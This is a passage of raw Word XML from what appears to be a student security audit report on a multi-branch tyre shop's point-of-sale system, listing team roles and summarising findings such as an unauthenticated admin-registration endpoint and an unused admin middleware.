                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00591D0B" w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IT22516916</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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5C81546D" w14:textId="70E6C8E8" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00591D0B" w:rsidP="00591D0B">
            <w:pPr>
              <w:spacing w:after="4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18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Configuration, transport, dependencies, test suite, CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="560805C4" w14:textId="77777777" w:rsidTr="00591D0B">
        <w:trPr>
          <w:trHeight w:val="435"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="299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pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>R.M.M.P. Bandara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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6634B5EB" w14:textId="23DD2164" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72D8EBD8" wp14:editId="06DCB8BB">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>71437</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="638175" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29609" name="Group 29609"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="638175" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="638175" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="132" name="Shape 132"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="638175" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="638175" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="628650" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="631280" y="0"/>
                                        <a:pt x="633525" y="930"/>
                                        <a:pt x="635385" y="2790"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="637245" y="4650"/>
                                        <a:pt x="638175" y="6895"/>
                                        <a:pt x="638175" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="638175" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="638175" y="135980"/>
                                        <a:pt x="637245" y="138225"/>
                                        <a:pt x="635385" y="140085"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="633525" y="141945"/>
                                        <a:pt x="631280" y="142874"/>
                                        <a:pt x="628650" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142874"/>
                                        <a:pt x="4650" y="141945"/>
                                        <a:pt x="2790" y="140085"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138225"/>
                                        <a:pt x="0" y="135980"/>
                                        <a:pt x="0" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="0" y="6895"/>
                                        <a:pt x="930" y="4650"/>
                                        <a:pt x="2790" y="2790"/>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609" style="width:50.25pt;height:11.25pt;position:absolute;z-index:-2147483522;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.62498pt;mso-position-vertical-relative:text;margin-top:-1.86305pt;" coordsize="6381,1428">
                      <v:shape id="Shape 132" style="position:absolute;width:6381;height:1428;left:0;top:0;" coordsize="638175,142875" path="m9525,0l628650,0c631280,0,633525,930,635385,2790c637245,4650,638175,6895,638175,9525l638175,133350c638175,135980,637245,138225,635385,140085c633525,141945,631280,142874,628650,142875l9525,142875c6895,142874,4650,141945,2790,140085c930,138225,0,135980,0,133350l0,9525c0,6895,930,4650,2790,2790c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00591D0B" w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IT22249166</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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Mar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F33EC97" w14:textId="609BBE7F" w:rsidR="00591D0B" w:rsidRPr="005C54CB" w:rsidRDefault="00591D0B">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Input/business-logic integrity, auditability, frontend invoice request boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CD210CA" w14:textId="3575E124" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4E247C"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177995C2"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0B26B864"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301C53E1"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7F154E95"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6AF66258"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533C717E"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77657D24"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178EF66E"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60CAD99F"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1521D724" w14:textId="77777777" w:rsidR="00C23DD3" w:rsidRPr="005C54CB" w:rsidRDefault="00C23DD3">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DACE07" w14:textId="1EAB2814" w:rsidR="00345BB3" w:rsidRPr="0008357A" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008357A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. Executive </w:t>
      </w:r>
      <w:r w:rsidR="00C23DD3" w:rsidRPr="0008357A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="0008357A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ummary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EC8AB" w14:textId="7E87B6DB" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="239" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22053824"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We took a production point-of-sale system that our team had previously built for a multi-branch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tyre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and auto-parts business, audited it, and fixed it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4785D6"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audit found </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>19 distinct vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. We fixed 14 and documented 5 as deliberately deferred with reasons. We also implemented </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Google OpenID Connect sign-in using the Authorization Code flow with PKCE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, applied to the staff login feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE62487" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">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Three findings stand out, because each one alone was sufficient to compromise the entire system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63670B6C" w14:textId="77777777" w:rsidR="0008357A"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65408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="462D74C8" wp14:editId="58E606C1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3837681</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19327</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1104900" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31017" name="Group 31017"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1104900" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1104900" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="148" name="Shape 148"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1104900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1104900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1098006" y="0"/>
                                  <a:pt x="1100251" y="929"/>
                                  <a:pt x="1102110" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1103970" y="4649"/>
                                  <a:pt x="1104900" y="6894"/>
                                  <a:pt x="1104900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1104900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1104900" y="126455"/>
                                  <a:pt x="1103970" y="128700"/>
                                  <a:pt x="1102110" y="130560"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1100251" y="132420"/>
                                  <a:pt x="1098006" y="133349"/>
                                  <a:pt x="1095375" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133349"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130560"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128700"/>
                                  <a:pt x="0" y="126455"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>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017" style="width:87pt;height:10.5pt;position:absolute;z-index:-2147483506;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:302.18pt;mso-position-vertical-relative:text;margin-top:-1.52188pt;" coordsize="11049,1333">
                <v:shape id="Shape 148" style="position:absolute;width:11049;height:1333;left:0;top:0;" coordsize="1104900,133350" path="m9525,0l1095375,0c1098006,0,1100251,929,1102110,2789c1103970,4649,1104900,6894,1104900,9525l1104900,123825c1104900,126455,1103970,128700,1102110,130560c1100251,132420,1098006,133349,1095375,133350l9525,133350c6895,133349,4650,132420,2790,130560c930,128700,0,126455,0,123825l0,9525c0,6894,930,4649,2790,2789c4650,929,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66432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B9DFBC0" wp14:editId="46CF9BDD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3094732</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152122</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31019" name="Group 31019"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="285750" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="152" name="Shape 152"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="929"/>
                                  <a:pt x="282960" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4649"/>
                                  <a:pt x="285750" y="6894"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126455"/>
                                  <a:pt x="284820" y="128700"/>
                                  <a:pt x="282960" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132419"/>
                                  <a:pt x="278855" y="133349"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133349"/>
                                  <a:pt x="4650" y="132419"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128700"/>
                                  <a:pt x="0" y="126455"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>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019" style="width:22.5pt;height:10.5pt;position:absolute;z-index:-2147483502;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:243.68pt;mso-position-vertical-relative:text;margin-top:11.9781pt;" coordsize="2857,1333">
                <v:shape id="Shape 152" style="position:absolute;width:2857;height:1333;left:0;top:0;" coordsize="285750,133350" path="m9525,0l276225,0c278855,0,281100,929,282960,2789c284820,4649,285750,6894,285750,9525l285750,123825c285750,126455,284820,128700,282960,130559c281100,132419,278855,133349,276225,133350l9525,133350c6895,133349,4650,132419,2790,130559c930,128700,0,126455,0,123825l0,9525c0,6894,930,4649,2790,2789c4650,929,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An unauthenticated endpoint that issued administrator credentials.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA0532" w14:textId="77777777" w:rsidR="0008357A" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>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POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/register</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sat outside every middleware group and accepted the caller's own choice of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role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
    <w:p w14:paraId="47143B50" w14:textId="7235166B"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One anonymous HTTP request returned a working admin bearer token. Every other access control in the application was downstream of this one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABBB2C3" w14:textId="77777777" w:rsidR="0008357A"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67456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="259B4015" wp14:editId="4FF63474">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5104506</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-11005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="933450" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31020" name="Group 31020"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="933450" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="933450" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="158" name="Shape 158"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="933450" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928801" y="929"/>
                                  <a:pt x="930661" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4649"/>
                                  <a:pt x="933450" y="6894"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="126454"/>
                                  <a:pt x="932520" y="128700"/>
                                  <a:pt x="930661" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928801" y="132419"/>
                                  <a:pt x="926555" y="133349"/>
                                  <a:pt x="923925" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133349"/>
                                  <a:pt x="4650" y="132419"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128700"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>
                                  <a:pt x="2790" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="929"/>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020" style="width:73.5pt;height:10.5pt;position:absolute;z-index:-2147483496;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:401.93pt;mso-position-vertical-relative:text;margin-top:-0.866577pt;" coordsize="9334,1333">
                <v:shape id="Shape 158" style="position:absolute;width:9334;height:1333;left:0;top:0;" coordsize="933450,133350" path="m9526,0l923925,0c926555,0,928801,929,930661,2789c932520,4649,933450,6894,933450,9525l933450,123825c933450,126454,932520,128700,930661,130559c928801,132419,926555,133349,923925,133350l9526,133350c6895,133349,4650,132419,2790,130559c930,128700,0,126454,1,123825l1,9525c0,6894,930,4649,2790,2789c4650,929,6895,0,9526,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An authorization layer that was built and never installed.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF8A57" w14:textId="77777777" w:rsidR="0008357A"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application contained a correct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AdminMiddleware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correctly registered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E345808" w14:textId="4ECB158E"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It was applied to exactly zero routes. Being signed in as any cashier was sufficient to cancel invoices, rewrite stock quantities, reprice goods, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>zero</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a customer's debt and read every profit report.</w:t>
      </w:r>
    </w:p>
